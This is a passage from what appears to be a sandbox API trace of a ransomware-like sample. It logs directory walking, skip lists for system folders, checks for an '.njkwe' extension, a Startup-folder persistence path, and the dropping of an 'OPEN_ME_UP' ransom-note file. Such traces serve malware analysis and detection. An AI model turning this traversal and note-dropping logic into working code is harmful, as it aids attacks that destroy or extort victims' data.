-1 [0073.369] lstrcmpW (lpString1=".", lpString2="taridd") returned -1 [0073.369] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Siufloc\\.", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.369] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Siufloc\\." (normalized: "c:\\programdata\\microsoft\\diagnosis\\siufloc\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.369] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd6a0bca, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0073.369] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.369] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.369] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.369] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.369] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.369] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Siufloc\\..") returned 49 [0073.369] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.369] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.369] StrStrIW (lpFirst="..", lpSrch=".njkwe") returned 0x0 [0073.370] lstrcmpW (lpString1="..", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0073.370] lstrcmpW (lpString1="..", lpString2="taridd") returned -1 [0073.370] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Siufloc\\..", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.370] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Siufloc\\.." (normalized: "c:\\programdata\\microsoft\\diagnosis"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.370] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd6a0bca, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 0 [0073.370] FindClose (in: hFindFile=0xc1a060 | out: hFindFile=0xc1a060) returned 1 [0073.370] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Siufloc\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 78 [0073.370] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Siufloc\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\diagnosis\\siufloc\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0073.370] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0073.371] CloseHandle (hObject=0x430) returned 1 [0073.371] GetProcessHeap () returned 0xbe0000 [0073.371] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0073.371] FindNextFileW (in: hFindFile=0xc1a160, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x4ddac897, ftLastAccessTime.dwHighDateTime=0x1d33839, ftLastWriteTime.dwLowDateTime=0x4e4cb173, ftLastWriteTime.dwHighDateTime=0x1d33839, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SoftLanding", cAlternateFileName="SOFTLA~1")) returned 1 [0073.371] lstrcmpiW (lpString1="SoftLanding", lpString2="Windows") returned -1 [0073.371] lstrcmpiW (lpString1="SoftLanding", lpString2="$Recycle.bin") returned 1 [0073.371] lstrcmpiW (lpString1="SoftLanding", lpString2="System Volume Information") returned -1 [0073.371] lstrcmpiW (lpString1="SoftLanding", lpString2="Program Files") returned 1 [0073.371] lstrcmpiW (lpString1="SoftLanding", lpString2="Program Files (x86)") returned 1 [0073.371] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding") returned 50 [0073.371] lstrcmpW (lpString1="SoftLanding", lpString2=".") returned 1 [0073.371] lstrcmpW (lpString1="SoftLanding", lpString2="..") returned 1 [0073.371] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0073.371] GetProcessHeap () returned 0xbe0000 [0073.371] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0073.371] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\*") returned 52 [0073.371] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x4ddac897, ftLastAccessTime.dwHighDateTime=0x1d33839, ftLastWriteTime.dwLowDateTime=0x4e4cb173, ftLastWriteTime.dwHighDateTime=0x1d33839, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a1a0 [0073.373] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.373] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.373] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.373] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.373] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.373] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\.") returned 52 [0073.373] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.374] StrStrIW (lpFirst=".", lpSrch=".njkwe") returned 0x0 [0073.374] lstrcmpW (lpString1=".", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0073.374] lstrcmpW (lpString1=".", lpString2="taridd") returned -1 [0073.374] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\.", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.374] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\." (normalized: "c:\\programdata\\microsoft\\diagnosis\\softlanding\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.374] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x4ddac897, ftLastAccessTime.dwHighDateTime=0x1d33839, ftLastWriteTime.dwLowDateTime=0x4e4cb173, ftLastWriteTime.dwHighDateTime=0x1d33839, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0073.375] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.375] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.375] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.375] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.375] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.375] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\..") returned 53 [0073.375] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.375] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.375] StrStrIW (lpFirst="..", lpSrch=".njkwe") returned 0x0 [0073.375] lstrcmpW (lpString1="..", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0073.375] lstrcmpW (lpString1="..", lpString2="taridd") returned -1 [0073.375] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\..", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.375] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\.." (normalized: "c:\\programdata\\microsoft\\diagnosis"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.375] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8bfa790, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x4de62c84, ftLastAccessTime.dwHighDateTime=0x1d33839, ftLastWriteTime.dwLowDateTime=0x840fae4f, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x41c2, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="03d1e1da-f580-45d7-afdd-3598ed7cdba4_show.xml", cAlternateFileName="03D1E1~1.XML")) returned 1 [0073.375] lstrcmpiW (lpString1="03d1e1da-f580-45d7-afdd-3598ed7cdba4_show.xml", lpString2="Windows") returned -1 [0073.375] lstrcmpiW (lpString1="03d1e1da-f580-45d7-afdd-3598ed7cdba4_show.xml", lpString2="$Recycle.bin") returned 1 [0073.375] lstrcmpiW (lpString1="03d1e1da-f580-45d7-afdd-3598ed7cdba4_show.xml", lpString2="System Volume Information") returned -1 [0073.375] lstrcmpiW (lpString1="03d1e1da-f580-45d7-afdd-3598ed7cdba4_show.xml", lpString2="Program Files") returned -1 [0073.375] lstrcmpiW (lpString1="03d1e1da-f580-45d7-afdd-3598ed7cdba4_show.xml", lpString2="Program Files (x86)") returned -1 [0073.375] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\03d1e1da-f580-45d7-afdd-3598ed7cdba4_show.xml") returned 96 [0073.375] StrStrIW (lpFirst="03d1e1da-f580-45d7-afdd-3598ed7cdba4_show.xml", lpSrch=".njkwe") returned 0x0 [0073.375] lstrcmpW (lpString1="03d1e1da-f580-45d7-afdd-3598ed7cdba4_show.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.375] lstrcmpW (lpString1="03d1e1da-f580-45d7-afdd-3598ed7cdba4_show.xml", lpString2="taridd") returned -1 [0073.375] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\03d1e1da-f580-45d7-afdd-3598ed7cdba4_show.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.375] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\03d1e1da-f580-45d7-afdd-3598ed7cdba4_show.xml" (normalized: "c:\\programdata\\microsoft\\diagnosis\\softlanding\\03d1e1da-f580-45d7-afdd-3598ed7cdba4_show.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.376] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c20a14, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x4defb5dd, ftLastAccessTime.dwHighDateTime=0x1d33839, ftLastWriteTime.dwLowDateTime=0x840fae4f, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x441b, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="03d1e1da-f580-45d7-afdd-3598ed7cdba4_withdraw.xml", cAlternateFileName="03D1E1~2.XML")) returned 1 [0073.376] lstrcmpiW (lpString1="03d1e1da-f580-45d7-afdd-3598ed7cdba4_withdraw.xml", lpString2="Windows") returned -1 [0073.376] lstrcmpiW (lpString1="03d1e1da-f580-45d7-afdd-3598ed7cdba4_withdraw.xml", lpString2="$Recycle.bin") returned 1 [0073.376] lstrcmpiW (lpString1="03d1e1da-f580-45d7-afdd-3598ed7cdba4_withdraw.xml", lpString2="System Volume Information") returned -1 [0073.376] lstrcmpiW (lpString1="03d1e1da-f580-45d7-afdd-3598ed7cdba4_withdraw.xml", lpString2="Program Files") returned -1 [0073.376] lstrcmpiW (lpString1="03d1e1da-f580-45d7-afdd-3598ed7cdba4_withdraw.xml", lpString2="Program Files (x86)") returned -1 [0073.376] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\03d1e1da-f580-45d7-afdd-3598ed7cdba4_withdraw.xml") returned 100 [0073.376] StrStrIW (lpFirst="03d1e1da-f580-45d7-afdd-3598ed7cdba4_withdraw.xml", lpSrch=".njkwe") returned 0x0 [0073.376] lstrcmpW (lpString1="03d1e1da-f580-45d7-afdd-3598ed7cdba4_withdraw.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.376] lstrcmpW (lpString1="03d1e1da-f580-45d7-afdd-3598ed7cdba4_withdraw.xml", lpString2="taridd") returned -1 [0073.376] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\03d1e1da-f580-45d7-afdd-3598ed7cdba4_withdraw.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.376] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\03d1e1da-f580-45d7-afdd-3598ed7cdba4_withdraw.xml" (normalized: "c:\\programdata\\microsoft\\diagnosis\\softlanding\\03d1e1da-f580-45d7-afdd-3598ed7cdba4_withdraw.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.376] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7750111, ftCreationTime.dwHighDateTime=0x1d336c5, ftLastAccessTime.dwLowDateTime=0x4df6de00, ftLastAccessTime.dwHighDateTime=0x1d33839, ftLastWriteTime.dwLowDateTime=0xb8128f6c, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x4180, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="394b7b36-41b9-4032-9875-c0240ca5a7f5_show.xml", cAlternateFileName="394B7B~1.XML")) returned 1 [0073.376] lstrcmpiW (lpString1="394b7b36-41b9-4032-9875-c0240ca5a7f5_show.xml", lpString2="Windows") returned -1 [0073.376] lstrcmpiW (lpString1="394b7b36-41b9-4032-9875-c0240ca5a7f5_show.xml", lpString2="$Recycle.bin") returned 1 [0073.376] lstrcmpiW (lpString1="394b7b36-41b9-4032-9875-c0240ca5a7f5_show.xml", lpString2="System Volume Information") returned -1 [0073.376] lstrcmpiW (lpString1="394b7b36-41b9-4032-9875-c0240ca5a7f5_show.xml", lpString2="Program Files") returned -1 [0073.377] lstrcmpiW (lpString1="394b7b36-41b9-4032-9875-c0240ca5a7f5_show.xml", lpString2="Program Files (x86)") returned -1 [0073.377] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\394b7b36-41b9-4032-9875-c0240ca5a7f5_show.xml") returned 96 [0073.377] StrStrIW (lpFirst="394b7b36-41b9-4032-9875-c0240ca5a7f5_show.xml", lpSrch=".njkwe") returned 0x0 [0073.377] lstrcmpW (lpString1="394b7b36-41b9-4032-9875-c0240ca5a7f5_show.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.377] lstrcmpW (lpString1="394b7b36-41b9-4032-9875-c0240ca5a7f5_show.xml", lpString2="taridd") returned -1 [0073.377] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\394b7b36-41b9-4032-9875-c0240ca5a7f5_show.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.377] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\394b7b36-41b9-4032-9875-c0240ca5a7f5_show.xml" (normalized: "c:\\programdata\\microsoft\\diagnosis\\softlanding\\394b7b36-41b9-4032-9875-c0240ca5a7f5_show.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.377] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7750111, ftCreationTime.dwHighDateTime=0x1d336c5, ftLastAccessTime.dwLowDateTime=0x4e006640, ftLastAccessTime.dwHighDateTime=0x1d33839, ftLastWriteTime.dwLowDateTime=0xb5c02e23, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x4187, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="394b7b36-41b9-4032-9875-c0240ca5a7f5_withdraw.xml", cAlternateFileName="394B7B~2.XML")) returned 1 [0073.377] lstrcmpiW (lpString1="394b7b36-41b9-4032-9875-c0240ca5a7f5_withdraw.xml", lpString2="Windows") returned -1 [0073.377] lstrcmpiW (lpString1="394b7b36-41b9-4032-9875-c0240ca5a7f5_withdraw.xml", lpString2="$Recycle.bin") returned 1 [0073.377] lstrcmpiW (lpString1="394b7b36-41b9-4032-9875-c0240ca5a7f5_withdraw.xml", lpString2="System Volume Information") returned -1 [0073.377] lstrcmpiW (lpString1="394b7b36-41b9-4032-9875-c0240ca5a7f5_withdraw.xml", lpString2="Program Files") returned -1 [0073.377] lstrcmpiW (lpString1="394b7b36-41b9-4032-9875-c0240ca5a7f5_withdraw.xml", lpString2="Program Files (x86)") returned -1 [0073.377] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\394b7b36-41b9-4032-9875-c0240ca5a7f5_withdraw.xml") returned 100 [0073.377] StrStrIW (lpFirst="394b7b36-41b9-4032-9875-c0240ca5a7f5_withdraw.xml", lpSrch=".njkwe") returned 0x0 [0073.377] lstrcmpW (lpString1="394b7b36-41b9-4032-9875-c0240ca5a7f5_withdraw.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.377] lstrcmpW (lpString1="394b7b36-41b9-4032-9875-c0240ca5a7f5_withdraw.xml", lpString2="taridd") returned -1 [0073.377] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\394b7b36-41b9-4032-9875-c0240ca5a7f5_withdraw.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.377] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\394b7b36-41b9-4032-9875-c0240ca5a7f5_withdraw.xml" (normalized: "c:\\programdata\\microsoft\\diagnosis\\softlanding\\394b7b36-41b9-4032-9875-c0240ca5a7f5_withdraw.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.377] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c46c2e, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x4e09efaa, ftLastAccessTime.dwHighDateTime=0x1d33839, ftLastWriteTime.dwLowDateTime=0x8625bd94, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x4360, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_show.xml", cAlternateFileName="75EF5B~1.XML")) returned 1 [0073.377] lstrcmpiW (lpString1="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_show.xml", lpString2="Windows") returned -1 [0073.377] lstrcmpiW (lpString1="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_show.xml", lpString2="$Recycle.bin") returned 1 [0073.377] lstrcmpiW (lpString1="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_show.xml", lpString2="System Volume Information") returned -1 [0073.377] lstrcmpiW (lpString1="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_show.xml", lpString2="Program Files") returned -1 [0073.377] lstrcmpiW (lpString1="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_show.xml", lpString2="Program Files (x86)") returned -1 [0073.377] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_show.xml") returned 96 [0073.377] StrStrIW (lpFirst="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_show.xml", lpSrch=".njkwe") returned 0x0 [0073.378] lstrcmpW (lpString1="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_show.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.378] lstrcmpW (lpString1="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_show.xml", lpString2="taridd") returned -1 [0073.378] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_show.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.378] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_show.xml" (normalized: "c:\\programdata\\microsoft\\diagnosis\\softlanding\\75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_show.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.378] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c46c2e, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x4e0c51fa, ftLastAccessTime.dwHighDateTime=0x1d33839, ftLastWriteTime.dwLowDateTime=0x86556ca1, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x4473, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_withdraw.xml", cAlternateFileName="75EF5B~2.XML")) returned 1 [0073.378] lstrcmpiW (lpString1="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_withdraw.xml", lpString2="Windows") returned -1 [0073.378] lstrcmpiW (lpString1="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_withdraw.xml", lpString2="$Recycle.bin") returned 1 [0073.378] lstrcmpiW (lpString1="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_withdraw.xml", lpString2="System Volume Information") returned -1 [0073.378] lstrcmpiW (lpString1="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_withdraw.xml", lpString2="Program Files") returned -1 [0073.378] lstrcmpiW (lpString1="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_withdraw.xml", lpString2="Program Files (x86)") returned -1 [0073.378] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_withdraw.xml") returned 100 [0073.378] StrStrIW (lpFirst="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_withdraw.xml", lpSrch=".njkwe") returned 0x0 [0073.378] lstrcmpW (lpString1="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_withdraw.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.378] lstrcmpW (lpString1="75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_withdraw.xml", lpString2="taridd") returned -1 [0073.378] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_withdraw.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.378] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_withdraw.xml" (normalized: "c:\\programdata\\microsoft\\diagnosis\\softlanding\\75ef5b41-571d-4a4b-92bb-8b9f7fdc831f_withdraw.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 